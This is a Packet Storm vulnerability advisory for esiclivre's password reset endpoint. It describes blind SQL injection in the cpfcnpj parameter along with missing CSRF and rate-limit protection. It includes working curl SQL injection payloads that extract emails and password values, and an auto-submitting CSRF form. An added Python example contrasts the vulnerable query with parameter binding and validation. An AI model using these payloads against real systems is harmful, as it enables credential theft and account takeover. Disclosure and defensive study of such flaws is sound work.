Description
The password reset functionality in esiclivre is affected by multiple vulnerabilities. The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling. Additionally, the endpoint lacks CSRF protection, input validation, and...
Basic Information
ID
PACKETSTORM:219565
Published
Apr 22, 2026 at 00:00
Affected Product
Affected Versions
==================================================================================================================================
| # Title : esiclivre <= 0.2.2 - Multiple Vulnerabilities |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 147.0.4 (64 bits) |
| # Vendor : https://github.com/esiclivre/esiclivre/blob/master/reset/index.php |
==================================================================================================================================
[+] Summary : The password reset functionality in esiclivre is affected by multiple vulnerabilities.
The cpfcnpj parameter is vulnerable to Blind SQL injection due to improper input handling.
Additionally, the endpoint lacks CSRF protection, input validation, and rate limiting,
enabling attackers to perform user enumeration, injection attacks, and abuse the password reset mechanism.
[+] POC :
Blind SQL Injection (UNION-based and Blind techniques) :
curl -X POST http://target/reset/index.php -d "cpfcnpj=0' UNION SELECT email,senha,3,4,5 FROM usuarios-- -"
curl -X POST http://target/reset/index.php -d "cpfcnpj=123' AND (SELECT SUBSTRING(@@version,1,1))='5"
CSRF Attack :
<form action="https://target/reset/index.php" method="POST">
<input type="hidden" name="cpfcnpj" value="' OR 1=1-- ">
<input type="submit">
</form>
<script>
document.forms[0].submit();
</script>
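Added example, not code from esiclivre or from the advisory's author, contrasting the defect described above (the cpfcnpj value spliced into the query) with the two mitigations it implies, parameter binding and strict input validation. It is written in Python with an in-memory SQLite table standing in for the PHP handler; the table and column names follow the advisory's payload, everything else is assumed.

```python
import re
import sqlite3

# Constructed in-memory stand-in for the application's user table. The table and
# column names come from the advisory's payload; the schema itself is assumed.
def build_db():
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE usuarios (id INTEGER, cpfcnpj TEXT, email TEXT, senha TEXT)")
    db.executemany("INSERT INTO usuarios VALUES (?, ?, ?, ?)", [
        (1, "12345678909", "alice@example.test", "hash-a"),
        (2, "11222333000181", "bob@example.test", "hash-b"),
    ])
    return db

def lookup_vulnerable(db, raw):
    # Mirrors the defect described in the advisory: the request parameter is
    # spliced into the SQL text, so a quote in it changes the query's logic.
    sql = f"SELECT email, senha FROM usuarios WHERE cpfcnpj = '{raw}'"
    return db.execute(sql).fetchall()

# A CPF is 11 digits and a CNPJ 14 digits; that is the only shape the reset
# endpoint should accept (check-digit validation would tighten this further).
CPFCNPJ_DIGITS = re.compile(r"\d{11}|\d{14}")

def normalize_cpfcnpj(raw):
    # Strip the separators these identifiers are usually written with, then
    # require an exact digit string. Anything else is rejected before any SQL runs.
    digits = re.sub(r"[.\-/]", "", raw)
    return digits if CPFCNPJ_DIGITS.fullmatch(digits) else None

def lookup_bound_only(db, raw):
    # Parameter binding alone: the value travels as data, never as SQL text,
    # so an injection string simply matches no row.
    sql = "SELECT email, senha FROM usuarios WHERE cpfcnpj = ?"
    return db.execute(sql, (raw,)).fetchall()

def lookup_hardened(db, raw):
    # Validation plus binding: reject malformed input, then bind the clean value.
    digits = normalize_cpfcnpj(raw)
    if digits is None:
        return None
    return lookup_bound_only(db, digits)

if __name__ == "__main__":
    db = build_db()
    payload = "' OR 1=1-- "                    # the advisory's CSRF form value
    print(lookup_vulnerable(db, payload))      # every user's email and senha value
    print(lookup_bound_only(db, payload))      # []
    print(lookup_hardened(db, payload))        # None: rejected before the query
    print(lookup_hardened(db, "123.456.789-09"))
```

The CSRF token check and rate limiting the summary also calls for belong in front of this lookup and are not shown here.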
Greetings to :==============================================================================
jericho * Larry W. Cashdollar * r00t * Yougharta Ghenai * Malvuln (John Page aka hyp3rlinx)|
============================================================================================